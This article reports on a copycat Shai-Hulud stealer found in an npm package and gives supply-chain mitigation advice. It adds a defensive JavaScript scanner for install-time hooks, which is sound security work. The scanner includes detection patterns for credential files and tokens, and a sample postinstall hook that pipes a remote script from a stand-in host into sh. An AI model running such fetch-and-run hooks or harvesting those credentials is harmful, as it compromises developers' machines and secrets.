A new stealer hidden in an npm package has been identified, the latest in a string of infections that have compromised numerous developer projects. According to the researcher who found it, the payload is a copycat of Shai-Hulud (the self-propagating npm worm whose name it borrows) and has been planted in yet another npm package. That brings the number of infected packages attributed to the same actor to four; the three earlier packages each carried a stealer as well.
An npm package stealer is malicious code embedded in a package published to the npm registry. It does not infect files a developer already has; it runs on the developer's machine (or the CI runner) when the compromised version is installed, and from there it can harvest secrets such as registry tokens, cloud credentials and SSH keys, or establish a foothold for the attacker. The risk is greatest for anyone who pulled the compromised version while it was live, and for any automated pipeline that installed it unattended.
npm, the registry's operator (part of GitHub), has not commented on the latest infection. Developers are advised to exercise caution when adding packages and to keep dependencies current, with one caveat that matters here: in a supply-chain compromise the newest release is often the infected one, so "update" should mean moving to a version confirmed clean rather than blindly taking the latest. Pinning versions in a lockfile, installing with npm ci, and running installs with scripts disabled where possible (npm's --ignore-scripts option) limit what a newly published malicious version can do.
The researcher who discovered the new stealer highlighted the importance of secure coding practices and the need for developers to stay vigilant in the face of growing threats to package security.
In the wake of the latest infection, developers are urged to review their dependency trees, including transitive dependencies and lockfiles, for the affected packages, replace any compromised versions, and rotate any credentials that were present on machines where a compromised version was installed, since a stealer's whole purpose is to have taken them already.
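One concrete way to do that review is to look at what each installed package runs at install time. The article does not say how this particular copycat executes, but install-time lifecycle scripts (preinstall, install, postinstall) are how the original Shai-Hulud and most npm stealers run, so auditing them is the first check a practitioner would make. The script below is an added example written for this page, not code from the article, the researcher, or npm; the indicator list and the sample manifests are constructed for illustration and are not real packages.

```javascript
// Added example (not from the article): audit package manifests for install-time
// lifecycle scripts, the usual execution vehicle for npm stealers. Pure functions
// take parsed package.json objects so the check runs offline on constructed data;
// scanNodeModules() applies the same check to a real node_modules directory.

// Hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Indicators that are rarely legitimate in an install hook (hypothetical list,
// chosen for this example; tune it to your own dependency tree).
const SUSPICIOUS = [
  { id: 'remote-fetch',     re: /\b(curl|wget)\b|https?:\/\//i },
  { id: 'eval-or-decode',   re: /\beval\(|atob\(|base64/i },
  { id: 'credential-paths', re: /\.npmrc|\.ssh\b|\.aws\b|\.git-credentials|NPM_TOKEN|GITHUB_TOKEN/ },
  { id: 'inline-node',      re: /\bnode\s+-e\b/ },
];

// Returns one finding per install hook declared in the manifest. Hooks with no
// indicators are still reported as 'review' because native build steps such as
// node-gyp are legitimate but deserve a look; anything with indicators is 'high'.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = SUSPICIOUS.filter((s) => s.re.test(command)).map((s) => s.id);
    findings.push({
      package: `${manifest.name}@${manifest.version}`,
      hook,
      command,
      indicators,
      severity: indicators.length > 0 ? 'high' : 'review',
    });
  }
  return findings;
}

function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

function summarize(findings) {
  return {
    high: findings.filter((f) => f.severity === 'high').length,
    review: findings.filter((f) => f.severity === 'review').length,
  };
}

// Walks node_modules (including @scoped and nested trees) and audits every
// package.json found. Node's fs is loaded lazily so the pure functions above
// stay usable without it.
function scanNodeModules(dir) {
  const fs = require('node:fs');
  const path = require('node:path');
  const manifests = [];
  const walk = (d) => {
    if (!fs.existsSync(d)) return;
    for (const entry of fs.readdirSync(d, { withFileTypes: true })) {
      if (!entry.isDirectory()) continue;
      const p = path.join(d, entry.name);
      if (entry.name.startsWith('@')) { walk(p); continue; } // scoped packages sit one level deeper
      const pj = path.join(p, 'package.json');
      if (fs.existsSync(pj)) {
        try { manifests.push(JSON.parse(fs.readFileSync(pj, 'utf8'))); } catch (_) { /* skip unparsable */ }
      }
      walk(path.join(p, 'node_modules')); // nested dependency trees
    }
  };
  walk(dir);
  return auditAll(manifests);
}

// Constructed sample manifests (not real packages): a clean package, a native
// build step, a base64-in-eval postinstall, and a remote script fetch.
const SAMPLE_MANIFESTS = [
  { name: 'left-bar', version: '1.2.3', scripts: { test: 'node test.js' } },
  { name: 'native-thing', version: '0.4.0', scripts: { install: 'node-gyp rebuild' } },
  { name: 'helper-utils', version: '2.0.1',
    scripts: { postinstall: 'node -e "eval(Buffer.from(\'Y29uc29sZS5sb2coMSk=\', \'base64\').toString())"' } },
  { name: 'tiny-colors', version: '3.3.3',
    scripts: { postinstall: 'curl -s https://example.invalid/setup.sh | sh' } },
];

if (typeof require !== 'undefined' && require.main === module) {
  const findings = process.argv[2] ? scanNodeModules(process.argv[2]) : auditAll(SAMPLE_MANIFESTS);
  for (const f of findings) {
    console.log(`[${f.severity}] ${f.package} ${f.hook}: ${f.command} ${f.indicators.join(',')}`);
  }
  console.log(summarize(findings));
}
```

Run it with no arguments to see the constructed samples audited, or pass a project's node_modules path to audit a real tree. Two design choices worth noting: every install hook is reported, not only the ones matching an indicator, because a clean-looking hook from a package that never needed one is itself a signal; and the check reads the installed package.json files rather than the registry metadata, so it sees exactly what npm would execute on this machine.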